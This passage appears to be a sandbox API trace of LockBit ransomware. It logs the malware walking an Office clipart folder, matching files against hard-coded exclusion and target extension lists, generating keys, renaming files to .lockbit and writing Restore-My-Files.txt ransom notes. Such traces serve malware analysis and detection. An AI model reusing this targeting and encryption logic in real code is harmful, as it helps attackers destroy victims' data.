files\\microsoft office\\clipart\\pub60cor\\j0187859.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0149.261] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0149.261] malloc (_Size=0x40068) returned 0x3e70008 [0149.261] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=2732) returned 1 [0149.262] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.262] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.262] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0149.262] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.263] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0149.263] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0149.269] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187859.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187859.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0149.269] malloc (_Size=0xa6) returned 0x1fa2ed8 [0149.269] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0149.271] free (_Block=0x1fa2ed8) [0149.271] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187859.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0149.271] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0149.271] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0149.271] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56510d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2394, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187861.WMF", cAlternateFileName="")) returned 1 [0149.271] lstrcmpiW (lpString1=".", lpString2="J0187861.WMF") returned -1 [0149.271] lstrcmpiW (lpString1="..", lpString2="J0187861.WMF") returned -1 [0149.271] PathFindExtensionW (pszPath="J0187861.WMF") returned=".WMF" [0149.271] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0149.271] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0149.271] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0149.271] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0149.272] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0149.272] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0149.272] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0149.272] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0149.272] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0149.272] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0149.272] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0149.272] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0149.272] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0149.272] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0149.272] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0149.272] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0149.272] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0149.272] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0149.273] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0149.273] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0149.273] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0149.273] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0149.273] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0149.273] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0149.273] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.273] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0149.273] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0149.273] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0149.273] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0149.273] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0149.273] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0149.273] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0149.273] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0149.274] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0149.274] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0149.274] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0149.274] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0149.274] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0149.274] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0149.274] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0149.274] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0149.274] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0149.274] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.274] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0149.274] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0149.274] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0149.274] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0149.275] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187861.WMF") returned 1 [0149.275] lstrcmpiW (lpString1="ntldr", lpString2="J0187861.WMF") returned 1 [0149.275] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187861.WMF") returned 1 [0149.275] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187861.WMF") returned -1 [0149.275] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187861.WMF") returned -1 [0149.275] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187861.WMF") returned 1 [0149.275] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187861.WMF") returned -1 [0149.275] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0149.275] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187861.WMF") returned=".WMF" [0149.275] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0149.275] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0149.275] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0149.275] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0149.275] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0149.275] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0149.276] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0149.276] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0149.276] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0149.276] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0149.276] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0149.276] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0149.276] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0149.276] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0149.276] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0149.276] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0149.276] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0149.276] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0149.276] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0149.276] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0149.277] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0149.277] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0149.277] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0149.277] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0149.277] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0149.277] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0149.277] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0149.277] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0149.277] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187861.WMF.lockbit") returned 72 [0149.277] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187861.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187861.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0149.284] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0149.284] malloc (_Size=0x40068) returned 0x3df0008 [0149.285] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9108) returned 1 [0149.285] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.285] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0149.285] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.286] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0149.286] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0149.289] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187861.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187861.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0149.289] malloc (_Size=0xa6) returned 0x1fa2ed8 [0149.289] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0149.290] free (_Block=0x1fa2ed8) [0149.290] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187861.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0149.291] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0149.291] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0149.291] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56510d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2a44, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187863.WMF", cAlternateFileName="")) returned 1 [0149.291] lstrcmpiW (lpString1=".", lpString2="J0187863.WMF") returned -1 [0149.291] lstrcmpiW (lpString1="..", lpString2="J0187863.WMF") returned -1 [0149.291] PathFindExtensionW (pszPath="J0187863.WMF") returned=".WMF" [0149.291] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0149.291] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0149.291] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0149.291] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0149.291] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0149.291] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0149.292] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0149.292] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0149.292] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0149.292] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0149.292] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0149.292] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0149.292] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0149.292] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0149.292] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0149.292] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0149.292] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0149.292] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0149.292] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0149.292] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0149.292] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0149.293] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0149.293] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0149.293] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0149.293] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.293] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0149.293] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0149.293] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0149.293] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0149.293] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0149.293] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0149.293] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0149.293] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0149.293] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0149.293] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0149.293] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0149.294] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0149.294] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0149.294] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0149.294] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0149.294] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0149.294] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0149.294] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.294] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0149.294] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0149.294] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0149.294] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0149.294] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187863.WMF") returned 1 [0149.294] lstrcmpiW (lpString1="ntldr", lpString2="J0187863.WMF") returned 1 [0149.294] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187863.WMF") returned 1 [0149.294] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187863.WMF") returned -1 [0149.295] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187863.WMF") returned -1 [0149.295] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187863.WMF") returned 1 [0149.295] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187863.WMF") returned -1 [0149.295] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0149.295] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187863.WMF") returned=".WMF" [0149.295] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0149.295] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0149.295] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0149.295] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0149.295] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0149.295] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0149.295] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0149.295] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0149.295] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0149.295] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0149.296] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0149.296] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0149.296] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0149.296] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0149.296] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0149.296] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0149.296] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0149.296] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0149.296] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0149.296] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0149.296] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0149.296] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0149.296] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0149.296] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0149.296] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0149.297] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0149.297] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0149.297] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0149.297] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187863.WMF.lockbit") returned 72 [0149.297] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187863.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187863.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0149.298] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0149.298] malloc (_Size=0x40068) returned 0x1ff1e60 [0149.298] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=10820) returned 1 [0149.298] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.299] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0149.299] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.300] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0149.300] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0149.305] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187863.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187863.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0149.305] malloc (_Size=0xa6) returned 0x1fa2ed8 [0149.305] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0149.307] free (_Block=0x1fa2ed8) [0149.307] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187863.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0149.307] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0149.307] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0149.310] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56510d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1258, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187881.WMF", cAlternateFileName="")) returned 1 [0149.310] lstrcmpiW (lpString1=".", lpString2="J0187881.WMF") returned -1 [0149.310] lstrcmpiW (lpString1="..", lpString2="J0187881.WMF") returned -1 [0149.310] PathFindExtensionW (pszPath="J0187881.WMF") returned=".WMF" [0149.310] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0149.310] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0149.310] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0149.310] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0149.310] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0149.310] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.311] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0149.312] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0149.312] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0149.312] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0149.312] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0149.312] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0149.312] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0149.312] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0149.312] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0149.312] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0149.312] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0149.312] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0149.312] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0149.312] lstrcmpiW (lpString1=".dll", 